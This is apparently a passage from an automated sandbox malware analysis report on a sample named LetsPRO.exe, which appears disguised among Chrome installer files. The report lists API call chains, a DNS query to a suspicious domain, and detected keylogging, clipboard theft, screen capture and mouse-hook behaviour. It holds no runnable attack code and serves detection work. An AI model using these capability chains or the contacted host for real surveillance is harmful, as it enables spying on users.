                  Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                  Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                  Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C950BF3 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C950BF3
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94CB0B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,5_2_6C94CB0B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9507B2 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C9507B2
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94C7E5 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,5_2_6C94C7E5
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C917CAD _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C917CAD
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94FE26 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94FE26
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DFA9 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,5_2_6C94DFA9
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F945 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F945
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DAA8 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,5_2_6C94DAA8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F48B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F48B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94D56F _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,5_2_6C94D56F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C951054 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C951054
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F051 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F051
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00254318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,8_2_00254318
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00265490 FindFirstFileExW,8_2_00265490
                  Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_0001CBAB FindFirstFileExW,16_2_0001CBAB
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_0012DB25 FindFirstFileExW,30_2_0012DB25
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDB6417 FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose,30_2_6CDB6417
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC98E75 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose,30_2_6CC98E75
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC98FBC GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,30_2_6CC98FBC
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC9ED9F FindFirstFileW,FindNextFileW,FindClose,30_2_6CC9ED9F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC9AA6F FindFirstFileW,FindNextFileW,FindClose,30_2_6CC9AA6F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCCA66F FindFirstFileW,FindClose,FindNextFileW,30_2_6CCCA66F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC98D3E FindFirstFileW,FindNextFileW,GetLastError,FindClose,30_2_6CC98D3E
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F380F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_03F380F0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4x nop then jo 6C931931h 5_2_6C9084A8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4x nop then mov byte ptr [ebp-00000090h], FFFFFFFEh 5_2_6C8FF4A2
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4x nop then push esi 5_2_6C8FF6B0

                  Networking

                  Source: DNS query: 156.248.54.11.webcamcn.xyz
                  Source: Joe Sandbox View ASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_025F3330 recv,timeGetTime,_memmove,4_2_025F3330
                  Source: global traffic DNS traffic detected: DNS query: 156.248.54.11.webcamcn.xyz
                  Source: ChromeSetup.exe, GoogleUpdate.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: ChromeSetup.exe, GoogleUpdate.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: ChromeSetup.exe, GoogleUpdate.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: ChromeSetup.exe, GoogleUpdate.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: ChromeSetup.exe, GoogleUpdate.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: ChromeSetup.exe, GoogleUpdate.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: ChromeSetup.exe, GoogleUpdate.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: goopdateres_ko.dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: ChromeSetup.exe, GoogleUpdate.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: ChromeSetup.exe, GoogleUpdate.exe String found in binary or memory: http://ocsp.digicert.com0
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 
0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 
0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 
0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 
0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: GoogleUpdate.exe String found in binary or memory: https://clients2.google.com/cr/report
                  Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://clients2.google.com/cr/reportcheckpointGoogle
                  Source: GoogleUpdate.exe String found in binary or memory: https://clients2.google.com/service/check2?crx3=true
                  Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/check2?crx3=trueSoftware
                  Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/update2/installers/icons/https://m.google.com/devicemanagement/data/apiLastCod
                  Source: GoogleUpdate.exe String found in binary or memory: https://m.google.com/devicemanagement/data/api
                  Source: GoogleUpdate.exe String found in binary or memory: https://update.googleapis.com/service/update2
                  Source: GoogleUpdate.exe, 0000001E.00000002.3261720735.0000000000B40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://update.googleapis.com/service/update22F
                  Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://update.googleapis.com/service/update2https://www.google.com/support/installer/?
                  Source: GoogleUpdate.exe String found in binary or memory: https://www.google.com/support/installer/?
                  Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: [esc] 4_2_03F3E850
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F3E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,4_2_03F3E850
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA3E5C lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,30_2_6CCA3E5C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F3BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,4_2_03F3BC70
                  Source: LetsPRO.exe Binary or memory string: DirectInput8Create
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: Yara match File source: 5.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 14.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
